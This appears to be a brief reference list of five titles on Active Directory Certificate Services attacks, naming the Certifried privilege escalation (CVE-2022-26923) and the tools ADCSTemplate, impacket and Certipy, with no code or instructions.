  • Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923)
  • ADCSTemplate
  • impacket
  • Certipy
  • Abusing Active Directory Certificate Services – Part One